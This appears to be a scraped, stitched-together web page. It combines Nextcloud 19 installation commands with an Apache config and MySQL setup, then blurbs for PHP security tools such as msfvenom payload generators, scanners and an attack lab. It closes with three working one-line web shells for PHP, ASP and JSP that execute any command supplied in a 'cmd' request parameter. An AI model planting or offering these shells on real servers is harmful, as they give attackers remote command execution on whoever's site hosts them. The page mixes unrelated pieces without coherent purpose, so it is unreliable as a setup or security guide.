Quick & dirty WordPress Command Execution Shell
Just another vulnerable web application.
apt install apache2 php7.3 mariadb-server php7.3-mbstring php7.3-curl php7.3-dom php7.3-gd php7.3-zip php7.3-bz2 php7.3-intl php7.3-memcached php7.3-imagick php7.3-mysql
mysql_secure_installation
nano /etc/apache2/sites-available/nextcloud.conf
Alias /nextcloud "/var/www/html/"
<Directory /var/www/html/>
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
<IfModule mod_dav.c>
Dav off
</IfModule>
</Directory>
a2ensite nextcloud.conf
a2enmod rewrite
a2enmod headers
a2enmod env
a2enmod dir
a2enmod mime
systemctl restart apache2
a2enmod ssl
a2ensite default-ssl
service apache2 reload
https://download.nextcloud.com/server/releases/nextcloud-19.0.0.zip
unzip nextcloud-19.0.0.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/
mysql -u root -p
CREATE DATABASE `database`;
CREATE USER user@localhost IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON `database`.* TO user@localhost;
FLUSH PRIVILEGES;
Open your browser and go to your site's page.
A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
PHP Static Analysis Tool - discover bugs in your code without running it!
Basic script to detect vulnerabilities in PHP source code using static analysis, based on regex
Lesser Known Web Attack Lab is for intermediate pentesters to test and practice lesser-known web attacks such as Object Injection, XSSI, PHAR Deserialization, variable variables, etc.
AMWSCAN (Antimalware Scanner) is a PHP antimalware/antivirus scanner console script written in PHP for scanning your project. It can work on PHP projects and a lot of other platforms.
Simple script to import/export CSV files in PHP
A few charts for finding vulnerabilities affecting PHP, phpMyAdmin, JS, etc.
PHP :
<? echo passthru($_GET['cmd']); ?>
ASP :
<% eval request("cmd") %>
JSP :
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>